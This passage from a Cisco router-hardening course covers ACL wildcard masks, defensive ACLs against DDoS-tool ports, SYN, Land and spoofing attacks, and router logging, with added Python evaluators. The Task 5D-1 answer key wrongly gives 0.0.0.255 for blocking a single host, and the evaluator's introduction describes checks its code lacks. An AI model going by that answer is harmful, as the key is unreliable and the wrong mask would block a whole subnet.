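    global_lines, interfaces = parse_config(text)
    present = set(global_lines)
    missing_global = []
    for cmd in GLOBAL_REQUIRED:
        if cmd in present:
            continue
        if cmd == "no ip finger" and "no service finger" in present:
            continue
        if cmd == "no cdp run" and interfaces and all(
                "no cdp enable" in lines for lines in interfaces.values()):
            continue
        missing_global.append(cmd)
    missing_if = {}
    for name, lines in interfaces.items():
        if "shutdown" in lines:               # an administratively down interface passes no traffic
            continue
        gaps = [cmd for cmd in INTERFACE_REQUIRED if cmd not in lines]
        if gaps:
            missing_if[name] = gaps
    return {"global": missing_global, "interfaces": missing_if}


# Constructed sample, modelled on the running-config excerpt shown earlier in this lesson.
SAMPLE_CONFIG = """\
version 12.0
no service tcp-small-servers
no service udp-small-servers
no ip source-route
no ip finger
no cdp run
!
interface Ethernet0
 ip address 172.16.0.1 255.255.0.0
 no ip directed-broadcast
 no ip unreachables
!
interface Serial0
 ip address 10.20.30.50 255.255.255.0
 no ip directed-broadcast
!
interface Serial1
 no ip address
 shutdown
!
router rip
 version 2
 network 172.16.0.0
end
"""

if __name__ == "__main__":
    for scope, gaps in audit(SAMPLE_CONFIG).items():
        print(scope, gaps)
```

On the sample, the audit reports that no ip bootp server and no ip http server are missing globally and that Serial0 still answers with ICMP unreachables; Serial1 is skipped because it is shut down. Feeding it the output of show running-config saved from a real device gives the same style of report, and the two lists at the top are the place to extend it as a site's baseline grows.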

Topic 5D
Creating Access Control Lists
Access Control Lists (ACLs) enable network administrators not only to control access from a security standpoint, but also to restrict bandwidth use on critical links. In this and the following topic, the discussion will be on IP access lists, but be aware that access lists can exist for other routed protocols, such as AppleTalk and IPX/SPX.

An ACL is a packet filter that compares a packet with a given set of criteria. The ACL checks the packet and acts upon the packet as defined by the list. Access Control Lists are divided into two main categories, standard and extended.

• Standard ACLs are designed to look at the source address of a packet that has been received by the router. The result of the list is to either permit or deny the packet based on the subnet, host, or network address. A standard access list takes effect for the full IP protocol stack.

• Extended ACLs are designed to look at both the source and destination packet addresses. Not limited to the source IP address, extended lists allow for checking of protocol, port number, and destination address. This additional flexibility is the reason that many administrators implement extended lists on their networks.

packet filter: Inspects each packet for user-defined content, such as an IP address, but does not track the state of sessions. This is one of the least secure types of firewall.


Access Control List Operation
The function of an access list is the same internally in the router, whether it is a standard list or an extended list. The process begins the same as a router with no access lists. First, as the packet enters the router, the routing table must be checked. If there is no route, the packet is discarded and a message may be returned to the sender (such as an ICMP destination unreachable message).

If the packet is routable, the router must next check to see if the interface that will route the packet has an access list defined. If there is no list, the packet is routed out the appropriate interface. If there is a list defined, the packet is verified through the list to decide if the packet is to be permitted or dropped.

Figure 5-13: The Access Control List process.

Figure 5-13 illustrates this process. A packet is taken in via Interface E0. In this example, the packet is incoming on Interface Ethernet 0 and destined to be outgoing on Interface Ethernet 1. Because the list is used to determine whether or not the packet is to exit on interface Ethernet 1, this list can be determined to be an outgoing list.

The Access List Process
A critical component of access lists is to understand that they operate in sequence, from the top down. In other words, the first statement of an access list is checked. If the packet does not match the rules of that statement, then the packet is sent to the next statement, and on and on, until there is a match.

Once there is a match, the packet will follow that rule. In the event that there are two rules that can apply to the same packet, whichever rule the packet hits first is the one that it will follow.


There will always be a match, since the end of every access list is an implicit deny, meaning that every list must have at least one permit statement or all packets will be denied! Figure 5-14 shows a graphical example of an access list statement process.

Figure 5-14: The list process of an ACL.

The Wildcard Mask
IP access lists use a value known as the wildcard mask to determine whether or not a packet matches a given statement in the list. The wildcard mask uses 1s and 0s to identify the defined IP address(es) for permission or denial.

Wildcard masks are 32-bit values that look like traditional subnet masks, but they do not function in the same manner. A wildcard mask uses the 1s and 0s to match defined bits of an IP address. The rules of the bits of a wildcard mask are as follows:

• If the wildcard mask bit is a 1, then do not check the corresponding bit of the IP address for a match.

• If the wildcard mask bit is a 0, then do check the corresponding bit of the IP address for a match.

The chart in Figure 5-15 shows several examples of the wildcard mask checking options. Where there is a 0, the values are checked for a match, and where there is a 1, the value is not checked.


Figure 5-15: Examples of wildcard masks.

As you can see from this chart, if there were a mask of 11111111, then none of the eight bits of the corresponding IP address would be checked. Likewise, if there were a wildcard mask of 00000000, then all eight bits of the corresponding IP address would be checked.

Wildcard Mask Examples
If an administrator wanted to have an access list statement match a single host in a network, the following wildcard mask could be used.

Item            Value
IP Address      10.15.10.187
Subnet Mask     255.255.255.0
Wildcard Mask   0.0.0.0

This tells the router to check every bit of the IP address, and if those bits are 10.15.10.187, then this access list statement applies to this host.

If the goal is to have an access list statement match an entire network, the following wildcard mask could be used.

Item            Value
IP Network      10.15.10.0
Subnet Mask     255.255.255.0
Wildcard Mask   0.0.0.255

This tells the router to check only the first 24 bits of the IP address, and if the decimal value of those bits is 10.15.10, then this access list statement applies to every host on this network.

If the goal is to block a specified subnet, the mask requires a bit more calculation, but still functions the same way. In the event that the administrator wants to have subnet 10.15.10.32 match an access list statement, the mask would be as follows.

Item                Value
IP Subnet Address   10.15.10.32
Subnet Mask         255.255.255.224
Wildcard Mask       0.0.0.31

This tells the router to check all but the last five bits of the fourth octet. If the checked bits equal 10.15.10.32, then the access list statement applies to every host on this subnet.
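The three tables above all follow one rule: the wildcard mask is the bit-for-bit inverse of the subnet mask of the block you want to match, and a single host is always matched with 0.0.0.0 whatever the subnet mask of the network it sits in. The following functions are an added example (not from the course) that carries that rule through in code: they derive the wildcard from a subnet mask or prefix length, apply it exactly as the router does, count how many address bits are actually compared, and show the address range a statement covers. The addresses are the course's own examples.

```python
"""Wildcard-mask arithmetic for Cisco IP access lists.

Added example; it is not from the course text. A wildcard mask is the bitwise
inverse of a subnet mask: 0 bits are compared with the address in the
statement, 1 bits are ignored. The addresses used are the course's examples.
"""
from ipaddress import IPv4Address
from typing import Tuple


def wildcard_from_subnet_mask(mask: str) -> str:
    """255.255.255.224 -> 0.0.0.31: invert all 32 bits of the subnet mask."""
    return str(IPv4Address(int(IPv4Address(mask)) ^ 0xFFFFFFFF))


def wildcard_from_prefix(prefix_len: int) -> str:
    """/27 -> 0.0.0.31: every host bit set to 1, every network bit 0."""
    return str(IPv4Address((1 << (32 - prefix_len)) - 1))


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """True when every bit the wildcard marks with 0 is identical in addr and base."""
    a, b, w = (int(IPv4Address(x)) for x in (addr, base, wildcard))
    return (a & ~w) == (b & ~w)


def checked_bits(wildcard: str) -> int:
    """Number of the 32 address bits the router actually compares (the 0 bits)."""
    return 32 - bin(int(IPv4Address(wildcard))).count("1")


def matching_range(base: str, wildcard: str) -> Tuple[str, str]:
    """Lowest and highest address a (base, wildcard) statement can match. Only
    meaningful for a contiguous wildcard (a proper /n block); a mask such as
    0.0.255.0 matches scattered addresses rather than one range."""
    b, w = int(IPv4Address(base)), int(IPv4Address(wildcard))
    if (w + 1) & w:
        raise ValueError(f"{wildcard} is not a contiguous wildcard mask")
    return str(IPv4Address(b & ~w)), str(IPv4Address((b & ~w) | w))


if __name__ == "__main__":
    # The three course examples: a host, the 10.15.10.0/24 network, the 10.15.10.32/27 subnet.
    for base, mask in (("10.15.10.187", "255.255.255.255"),
                       ("10.15.10.0", "255.255.255.0"),
                       ("10.15.10.32", "255.255.255.224")):
        wc = wildcard_from_subnet_mask(mask)
        print(base, wc, checked_bits(wc), matching_range(base, wc))
```

matching_range is the quick sanity check to run on any statement before it goes into a list: 10.15.10.32 with 0.0.0.31 covers 10.15.10.32 through 10.15.10.63, while the same base with 0.0.0.255 would silently widen the statement to the whole /24.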

TASK 5D-1
Creating Wildcard Masks

1. If your goal is to block out a single host, such as 192.168.27.93, that uses 255.255.255.0 as the subnet mask, what wildcard mask would you use?

0.0.0.255.

2. If your goal is to block out a subnet of 10.12.24.0 that uses 255.255.248.0 as the subnet mask, what wildcard mask would you use?

0.0.7.255.

3. If your goal is to block out network 172.168.32.0 that uses 255.255.255.0 as the subnet mask, what wildcard mask would you use?

0.0.0.255.

Topic 5E
Implementing Access Control Lists
In this topic, we will detail the implementation of and rule-creation for access lists. There will be examples of access lists and their syntax on a Cisco router. Examples will include both standard and extended IP access lists, the most common lists for networks connected to the Internet today.

Access Control Lists are implemented in two stages on Cisco routers. The first stage is to create the list, including all of its statements. The second stage is the implementation of the list on an interface of a router, defining whether the list is to filter packets as an inbound or outgoing list.

Standard Access Control List Command Syntax
To create a standard ACL, the following line shows the proper syntax. Items in italics are variables to be filled in.

Router(config)#access-list access-list-number {permit|deny} source [source-mask]

Although you have the option of using standard or extended access lists, the extended lists are preferred because they provide more granularity when you are permitting and denying traffic.


Where:

• access-list is the actual command to create a list.

• access-list-number is a value between 1 and 99 that is selected to create a standard ACL.

• permit|deny is the value that defines whether the list will grant or block access.

• source is the value that is the actual source address to match.

• source-mask is the value that specifies the wildcard mask for the defined host.

Once the list has been created, the second stage is to apply the list to an interface. Before you do this, however, make sure that you have specified the interface that you want to be affected by the list. The syntax for list application is shown here. Again, items in italics are variables to be filled in.

Router(config-if)#ip access-group access-list-number {in|out}

Where:

• ip access-group is the command to link (implement) a list to an interface.

• access-list-number is the value assigned to the actual list to be implemented on this interface.

• in|out is the value that defines whether the list will filter inbound or outbound packets.

Extended Access Control List Syntax
To create an extended ACL, the following line shows the proper syntax. Remember, items in italics are variables to be filled in.

Router(config)#access-list access-list-number {permit|deny} protocol source source-mask destination destination-mask [operator|operand]

Where:

• access-list is the actual command to create a list.

• access-list-number is a value between 100 and 199 that is selected to create an extended ACL.

• permit|deny is the value that defines whether the list will grant or block access.

• protocol is the value that defines what protocol to filter.

• source is the value that defines the source IP address.

• source-mask is the value that defines the wildcard mask for the source.

• destination is the value that defines the destination IP address.

• destination-mask is the value that defines the wildcard mask for the destination.

• operator|operand is the value that defines the options for the list. Options include:

— GT—Greater than

— LT—Less than

— EQ—Equal to


— NEQ—Not Equal to

Once the list has been created, the second stage is to apply the list to an interface. The syntax for list application is shown. As before, items in italics are variables to be filled in.

Router(config-if)#ip access-group access-list-number {in|out}

Where:

• ip access-group is the command to link (implement) a list to an interface.

• access-list-number is the value assigned to the actual list to be implemented on this interface.

• in|out is the value that defines whether the list will filter inbound or outbound packets.

Figure 5-16: A sample network for ACL implementation.

Use Figure 5-16 with the network and host IP addresses defined to look at several examples of access lists. The same figure will be used for all examples, only with different lists, different goals, and different implementations. These examples will be using both standard and extended IP access lists.

Denial of a Specific Host
Our first example will be the simple denial of a defined host into the router. This can be accomplished by using a standard ACL.

The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 23 deny 192.168.10.7 0.0.0.0
Router(config)#access-list 23 permit 0.0.0.0 255.255.255.255
Router(config)#interface Ethernet 0
Router(config-if)#ip access-group 23 in
Router(config-if)#^Z
Router#

The third line is permitting all traffic not denied by the second line. The word “any” can be used in place of “0.0.0.0 255.255.255.255.”


Denial of a Subnet
Our second example will be the denial of a defined host out to the Internet and the denial of an entire network to the Internet. This can also be accomplished by using a standard ACL. The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 45 deny 192.168.10.7 0.0.0.0
Router(config)#access-list 45 deny 192.168.20.0 0.0.0.255
Router(config)#access-list 45 permit 0.0.0.0 255.255.255.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 45 out
Router(config-if)#^Z
Router#

Denial of a Network
Our third example will be the denial of an entire network from another network. This can be accomplished by using a standard ACL. The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 57 deny 192.168.20.0 0.0.0.255
Router(config)#access-list 57 deny 192.168.10.0 0.0.0.255
Router(config)#access-list 57 permit 0.0.0.0 255.255.255.255
Router(config)#interface Ethernet 0
Router(config-if)#ip access-group 57 out
Router(config-if)#interface Ethernet 1
Router(config-if)#ip access-group 57 out
Router(config-if)#^Z
Router#

Granting Telnet from One Specific Host
Our fourth example will be limiting the permission of given hosts to telnet to the Internet and the denial of a network telnetting to the Internet. This can be accomplished by using an extended ACL, due to the need to control access to individual ports. The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 123 permit tcp 192.168.20.16 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 permit tcp 192.168.10.7 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 deny tcp 192.168.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 123 out
Router(config-if)#^Z
Router#

Granting FTP to a Subnet
Our fifth example will be granting one subnet the ability to ftp to the Internet, while denying the other subnet. Again, this can be accomplished by an extended ACL, due to the need to control access to individual ports. The configuration fragment for this example is:

The fourth line is permitting all traffic not denied by the second and third lines.

For the fifth line, permit ip any any could be used to shorten the syntax.


Router#configure terminal
Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 20
Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 21
Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 20
Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 21
Router(config)#access-list 145 permit ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 145 out
Router(config-if)#^Z
Router#

Defending Against Attacks with ACLs
ACLs can be used for much more than simply granting or denying access to a service or utility. They can be used to guard against known attacks on the network, such as SYN and DoS attacks. This is due to the fact that many tools use known and identifiable patterns in their attacks.

Anti-DoS ACLs
These ACLs work by recognizing the protocol and port selection of the DoS attack. It is possible that by using these ACLs, you may block legitimate applications that have chosen the same high port values, so that must be taken into account. In order to prevent hosts inside the network from participating in a DoS on an Internet host, you should consider placing these on all interfaces, in both directions. At the minimum, you will place these lists on the inbound interfaces that are connected to the Internet.

In the configuration fragment that follows, the first section (ports 27665, 31335, 27444) of the list is designed to block the TRINOO DDoS, and the second section (ports 6776, 6669, 2222, 7000) is designed to block the SubSeven DDoS.

Router(config)#access-list 160 deny tcp any any eq 27665
Router(config)#access-list 160 deny udp any any eq 31335
Router(config)#access-list 160 deny udp any any eq 27444
Router(config)#access-list 160 deny tcp any any eq 6776
Router(config)#access-list 160 deny tcp any any eq 6669
Router(config)#access-list 160 deny tcp any any eq 2222
Router(config)#access-list 160 deny tcp any any eq 7000

Anti-SYN ACLs
The TCP SYN attack is where the attacker floods the target host and disallows any legitimate connections to be made by the target host. To work on blocking this, the ACL must allow legitimate TCP connections, which are created by hosts inside the network, but disallow connections to those hosts from outside (like on the Internet).

In this first configuration fragment, traffic that is established internally is allowedout, and incoming connections are not able to create new sessions.


Router#configure terminal
Router(config)#access-list 170 permit tcp any 192.168.20.0 0.0.0.255 established
Router(config)#access-list 170 deny ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 170 in
Router(config-if)#^Z
Router#

Anti-Land ACLs
Another type of attack that has been around for some time is the Land attack. The Land attack is rather simple in design, but it can cause serious network damage to unprotected systems. The attack works by sending a packet from an IP address to the same IP address, and using the same ports. So, a packet would be sent from 10.10.10.10:5700 to 10.10.10.10:5700, causing a significant slowdown or DoS of the target.

The following configuration fragment shows the defense against a Land attack on host 10.20.30.50, which is an IP address of an external interface on the router.

Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip address 10.20.30.50 255.255.255.0
Router(config-if)#exit
Router(config)#
Router(config)#access-list 110 deny ip host 10.20.30.50 host 10.20.30.50 log
Router(config)#access-list 110 permit ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 110 in
Router(config-if)#^Z
Router#

Anti-spoofing ACLs

Spoofing of packets has become more commonplace due to the increased number of tools that provide this function. You can use your router to combat this issue by not allowing packets to enter the network from the outside if they claim to come from an internal IP address.

When you create these lists, you want them to be complete. In other words, do not forget to block the broadcast addresses (to prevent attacks like the Smurf attack), the network addresses themselves, and private or reserved addresses. In the following configuration fragment, the internal network is 152.148.10.0/24, and you will see that quite a few lines are necessary to provide full spoof protection:


Router#configure terminal
Router(config)#access-list 130 deny ip 152.148.10.0 0.0.0.255 any
Router(config)#access-list 130 deny ip 127.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 0.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 10.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 172.16.0.0 0.15.255.255 any
Router(config)#access-list 130 deny ip 192.168.0.0 0.0.255.255 any
Router(config)#access-list 130 deny ip host 255.255.255.255 any
Router(config)#access-list 130 permit ip any 152.148.10.0 0.0.0.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 130 in
Router(config-if)#^Z
Router#
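To see how the router evaluates the anti-SYN, anti-Land and anti-spoofing lists above, the following Python ACL evaluator is an added example; it is not course material or Cisco code. It implements the wildcard-mask match, top-down first-match evaluation and the implicit deny at the end of every list, and parses the three lists in the syntax used in this lesson. The packets it tests are constructed. Its spoofing list uses 0.255.255.255 for 0.0.0.0/8 and 0.15.255.255 for 172.16.0.0/12; the last checks show that a 255.255.255.255 wildcard matches every address (so it would deny all inbound traffic) and that 0.0.240.255 leaves part of 172.16.0.0/12 uncovered.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Added example: a minimal evaluator for the numbered IOS ACL syntax used in
# this lesson. Not Cisco code; behaviour follows the lesson's description
# (top-down evaluation, first match wins, implicit "deny ip any any" last).


@dataclass
class Packet:
    src: str
    dst: str
    proto: str = "ip"          # "ip", "tcp" or "udp"
    dport: int = 0
    established: bool = False  # TCP segment with ACK or RST set


@dataclass
class Ace:
    action: str                # "permit" or "deny"
    proto: str
    src: str                   # "any", "host A.B.C.D" or "A.B.C.D W.W.W.W"
    dst: str
    dport: Optional[int] = None
    established: bool = False


def wildcard_match(addr: str, spec: str) -> bool:
    """Cisco wildcard match: a 1 bit in the wildcard means 'do not care'."""
    if spec == "any":
        return True
    parts = spec.split()
    base, wild = (parts[1], "0.0.0.0") if parts[0] == "host" else parts
    care = ~int(ipaddress.IPv4Address(wild)) & 0xFFFFFFFF
    return int(ipaddress.IPv4Address(addr)) & care == int(ipaddress.IPv4Address(base)) & care


def parse_ace(line: str) -> Ace:
    """Parse 'access-list N {permit|deny} proto src dst [eq port] [established] [log|log-input]'."""
    tok = line.split("#")[-1].split()      # drop a 'Router(config)#' prompt if present
    if tok[0] != "access-list":
        raise ValueError(line)
    action, proto, i = tok[2], tok[3], 4
    addrs = []
    for _ in range(2):                     # source, then destination
        if tok[i] == "any":
            addrs.append("any")
            i += 1
        elif tok[i] == "host":
            addrs.append(f"host {tok[i + 1]}")
            i += 2
        else:
            addrs.append(f"{tok[i]} {tok[i + 1]}")
            i += 2
    ace = Ace(action, proto, addrs[0], addrs[1])
    while i < len(tok):
        if tok[i] == "eq":
            ace.dport = int(tok[i + 1])
            i += 2
        elif tok[i] == "established":
            ace.established = True
            i += 1
        else:
            i += 1                         # log / log-input do not change the verdict
    return ace


def evaluate(acl: List[Ace], pkt: Packet) -> str:
    for ace in acl:
        if ace.proto != "ip" and ace.proto != pkt.proto:
            continue
        if not (wildcard_match(pkt.src, ace.src) and wildcard_match(pkt.dst, ace.dst)):
            continue
        if ace.dport is not None and ace.dport != pkt.dport:
            continue
        if ace.established and not pkt.established:
            continue
        return ace.action
    return "deny"                          # implicit deny at the end of every ACL


# The lists from this lesson, as typed on the router.
ANTI_SYN = [parse_ace(l) for l in [
    "access-list 170 permit tcp any 192.168.20.0 0.0.0.255 established",
    "access-list 170 deny ip any any",
]]
ANTI_LAND = [parse_ace(l) for l in [
    "access-list 110 deny ip host 10.20.30.50 host 10.20.30.50 log",
    "access-list 110 permit ip any any",
]]
ANTI_SPOOF = [parse_ace(l) for l in [
    "access-list 130 deny ip 152.148.10.0 0.0.0.255 any",
    "access-list 130 deny ip 127.0.0.0 0.255.255.255 any",
    "access-list 130 deny ip 0.0.0.0 0.255.255.255 any",
    "access-list 130 deny ip 10.0.0.0 0.255.255.255 any",
    "access-list 130 deny ip 172.16.0.0 0.15.255.255 any",
    "access-list 130 deny ip 192.168.0.0 0.0.255.255 any",
    "access-list 130 deny ip host 255.255.255.255 any",
    "access-list 130 permit ip any 152.148.10.0 0.0.0.255",
]]

if __name__ == "__main__":
    # Constructed packets, all arriving inbound on Serial 0.
    print(evaluate(ANTI_SYN, Packet("203.0.113.9", "192.168.20.5", "tcp", 80)))   # deny (new session)
    print(evaluate(ANTI_SPOOF, Packet("152.148.10.7", "152.148.10.1")))            # deny (spoofed source)
    print(wildcard_match("152.148.10.7", "0.0.0.0 255.255.255.255"))               # True (matches anything)
```

Because the evaluator stops at the first matching entry, the order of the lines in the anti-spoofing list matters just as it does on the router: the permit for the internal destination must come after every deny, or spoofed packets would be accepted.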

TASK 5E-1
Creating Access Control Lists

Setup: Use the network as diagrammed in Figure 5-16 for this task.

1. Create the configuration fragment that you would use to create an Access Control List to prevent a SYN attack coming from the Internet into the private networks.

Router#configure terminal
Router(config)#access-list 135 permit tcp any 192.168.20.0 0.0.0.255 established
Router(config)#access-list 135 permit tcp any 192.168.10.0 0.0.0.255 established
Router(config)#access-list 135 deny ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 135 in
Router(config-if)#^Z
Router#

Topic 5F
Logging Concepts

Although it does not get the credit or generate a high level of interest, logging on the router is a critical aspect of router hardening. Logs enable you to investigate attacks, find problems in the network, and analyze the network.

When you are configuring the logging options on a router, just as with logging elsewhere in the network, you must walk a fine line between gathering too much and too little information. Log too much, and you will have a difficult time finding that single piece of critical information you need to make a decision or to perform an action. Log too little, and you do not have enough information to make an informed decision or to take proper action.

There are many different kinds of logging applications and software products that can track and record logs from all over the network. These applications can then send messages to a pager or cell phone when significant events happen. In this section, you will look at just the options that the actual router can manage, without using any major third-party applications.

Cisco Logging Options

On a Cisco router, the device can log information using several different methods, such as:

• Console Logging—Log messages are sent to the console port directly.

• Terminal Logging—Log messages are sent to the VTY sessions.

• Buffered Logging—Log messages are kept in the RAM on the router. Once the buffer fills, the oldest messages are overwritten by newer messages.

• Syslog Logging—Log messages can be sent to an external syslog server to store and sort the messages there.

• SNMP Logging—Log messages are sent (by using SNMP traps) to an SNMP server on the network.

Log Priority

The router has a built-in priority scheme for log messages. The levels range from 0 to 7. A message with a lower number is considered more critical. So, Level 1 is more critical than Level 6.

When you select a level, that level and all levels with a lower number will be displayed. For example, if you select level 3, you will be presented with messages from level 3 to 0. If you select level 7, you will be presented with messages from level 7 to 0.

The following table lists the level of logs, along with their titles and descriptions.

Level  Title          Description
0      Emergencies    System is (or is becoming) unusable.
1      Alerts         Immediate action is needed.
2      Critical       A critical condition has occurred.
3      Errors         An error condition has occurred.
4      Warnings       A warning condition has occurred.
5      Notifications  Normal, but noteworthy event.
6      Informational  Informative message.
7      Debugging      Debugging message.

The following table lists an example event for each level of severity.

Level  Example
0      The IOS was unable to initialize.
1      The core router temperature is too high.
2      A problem in assigning memory occurred.
3      The memory size allocated is invalid.
4      Cryptography operation is unable to complete.
5      An interface changed state to up or down. (This is a very common event.)
6      A packet has been denied by an Access Control List.
7      No event triggers this level; debug messages are displayed only when the debug option is used.

An example of what a log line will look like in the router is:

%SYS-5-CONFIG_I: Configured from console by vty1 (172.16.10.1)

In this line, %SYS-5-CONFIG_I indicates that a Level 5 message was logged. Following the colon is the message itself. In this case, the router had a configuration change made via a VTY session from IP address 172.16.10.1.
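The following Python parser is an added example, not from the course or from Cisco: it splits lines of the %FACILITY-SEVERITY-MNEMONIC: text form shown above into their fields, applies the level selection described under Log Priority (choosing level N keeps levels 0 through N, with the IOS level names accepted as well as numbers), identifies the level-6 messages that ACL entries with the log keyword produce, and computes the syslog PRI value a collector receives for a given facility and severity (RFC 3164: facility code times 8 plus severity; local0 through local7 are codes 16 through 23). All sample lines except the first, which is quoted from the text, are constructed in the IOS format.

```python
import re
from typing import Dict, List, Optional, Union

# Added example (not course or Cisco code): parse IOS log lines and apply the
# lesson's severity selection rule.

LEVEL_NAMES = ["emergencies", "alerts", "critical", "errors",
               "warnings", "notifications", "informational", "debugging"]

LINE_RE = re.compile(
    r"^%(?P<facility>[A-Z0-9_]+)-(?P<severity>[0-7])-(?P<mnemonic>[A-Z0-9_]+): (?P<text>.*)$"
)

# Constructed sample lines in IOS format; only the first is quoted from the lesson.
SAMPLE_LOG = [
    "%SYS-5-CONFIG_I: Configured from console by vty1 (172.16.10.1)",
    "%LINK-3-UPDOWN: Interface Serial0, changed state to down",
    "%LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to down",
    "%SEC-6-IPACCESSLOGP: list 123 denied tcp 172.16.5.5(1234) -> 172.16.9.9(80), 1 packet",
    "not a router message at all",
]


def parse_line(line: str) -> Optional[Dict]:
    """Return the fields of one %FACILITY-SEV-MNEMONIC: text line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["severity"] = int(rec["severity"])
    rec["level_name"] = LEVEL_NAMES[rec["severity"]]
    return rec


def level_number(level: Union[int, str]) -> int:
    """Accept 0-7 or an IOS level name; a prefix such as 'notification' is enough, as on the router."""
    if isinstance(level, int):
        return level
    return next(i for i, name in enumerate(LEVEL_NAMES) if name.startswith(level.lower()))


def select(lines: List[str], level: Union[int, str]) -> List[Dict]:
    """Keep messages at the chosen level or more critical (a lower number)."""
    limit = level_number(level)
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["severity"] <= limit:
            out.append(rec)
    return out


def is_acl_log(rec: Dict) -> bool:
    """ACL log / log-input hits are SEC-6-IPACCESSLOG* messages, i.e. level 6."""
    return rec["facility"] == "SEC" and rec["mnemonic"].startswith("IPACCESSLOG")


def syslog_pri(facility: str, severity: int) -> int:
    """PRI as sent to a syslog server: facility code * 8 + severity (local0..local7 = 16..23)."""
    code = 16 + int(facility.lower()[len("local"):])
    return code * 8 + severity


if __name__ == "__main__":
    # At level 5 (the 'logging console notification' setting used later in
    # this topic) the level-6 ACL hit is not shown.
    for rec in select(SAMPLE_LOG, "notification"):
        print(rec["severity"], rec["mnemonic"], "ACL" if is_acl_log(rec) else "")
    print(syslog_pri("Local5", 5))   # 173
```

Because the level-6 ACL hit drops out at the level-5 setting, a router whose trap level is 5 will never deliver its ACL log entries to the syslog server; that setting and the ACL logging described later in this topic have to be chosen together.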

Configuring Logging

In the following examples, you will see how to configure different forms of logging. Some will use the buffer, others the console. Viewing the configuration fragments throughout this section will enable you to determine which type of logging you will use in given situations. On the Cisco router, the command to enable logging is entered in Global Configuration Mode, using the logging on command.

Timestamping

In order for you to properly analyze the logs, you will need to know what happened when, not just that something happened. Assigning the time at which an event occurred, or timestamping, is an option in the router. The Cisco command to configure the timestamp option is service timestamps log datetime. There are three options that can be added to this command.

• The msec option will include the millisecond in a log entry. This may or may not be required, based on your goals. If not added, the log will round the event to the nearest full second.

• The localtime option will make the router stamp the logs using the local time, so that it is easier for people to read and analyze the logs. When using a syslog server, this option is often left off.

• The show-timezone option adds the timezone to the log message. This can be useful when working with log files from many locations and regions.

Console Logging

Console logging is perhaps the most straightforward of all of the logging options in the Cisco router. The following configuration fragment shows logging set to level 5 and to use the console as the method.

Router#configure terminal
Router(config)#logging on
Router(config)#logging console notification
Router(config)#^Z
Router#

In this example, level 5 logging has been configured. This means that items at the access list level (level 6) will not be logged, nor will any debug messages. Had the goal been to see only those log messages that are level 2 or more critical, the proper command would have been logging console critical.

When you are configuring logging in IOS 11.3 and earlier versions, the command must include the name of the level, such as Alerts. In IOS 12.0 and newer versions, you can use either the name of the level or the number of the level.


Buffered Logging

Buffered logging requires you to define the memory size that will be used for the logs. The general formula that many follow is that if the router has less than 16 MB of RAM, your log can be 16 kilobytes. If your router has more than 16 MB of RAM, then your log can go as high as 32 or even 64 KB.

On all logs, the time and date can be added to the messages, which is a recommended procedure. On buffered logging, however, it goes from a recommended to a required procedure. This is because the router discards old messages and replaces them with new messages when the buffer space is filled. So, the time of the log is a critical component of buffered logging. The following configuration fragment shows logging set to level 2, and using a timestamp.

Router#configure terminal
Router(config)#logging on
Router(config)#logging buffered 16000 critical
Router(config)#service timestamps log datetime msec localtime show-timezone
Router(config)#^Z
Router#

In this example, the amount of memory that has been allocated is 16 KB. The logs will go to the buffer and will be recorded if they are level 2 (Critical) or more critical. Finally, full timestamping is used, including the local time and the time zone options.

Terminal Logging

Normally, there are no messages sent to terminal sessions. This is for bandwidth purposes and, in some situations, security purposes. In order to allow logging to be visible on a VTY session, the terminal monitor command must be used. The following configuration fragment shows logging set to level 5, and to be sent to the VTY sessions.

Router#configure terminal
Router(config)#logging on
Router(config)#logging monitor 5
Router(config)#^Z
Router#terminal monitor
Router#

In this example, the terminal session will receive all level 5 and more critical messages. This is the first example that uses the numeric value of the level instead of the name, an indicator that the router must be at least IOS version 12.0. There is a second part to terminal logging. The above fragment tells the router to log messages to the VTY sessions, but the VTY sessions have not been configured to see the messages. The terminal monitor command enables the VTY session to actually view the messages on screen. In the event that the logs become too numerous or are no longer needed, the terminal no monitor command can be used to stop viewing the logs on the VTY session.

Syslog Logging

Cisco routers have the ability to send their log messages to a server that is running as a syslog server. This is a highly recommended method of logging in a production environment. Routers collect the log messages, just as they normally do. However, instead of showing them on the console, or storing them in memory, they are sent to a server that will manage the messages and store them to the server's hard drive.

This will allow for long-term storage and analysis of the information and will not be subject to real-time analysis or memory constraints. Most UNIX and Linux servers have some version of the syslog server function, and there are many syslog applications for Windows systems on the market.

To configure syslog logging on a Cisco router, there are four components:

• The destination host is any host that can be located using a host name, DNS name, or an IP address.

• The syslog facility is the name to use to configure the storage of the messages on the syslog server. Although there are quite a few facility names, the routers will use the ones named Local0 through Local7.

• The severity level of the logs can be viewed as similar to that of the other log messages, using the Cisco severity levels.

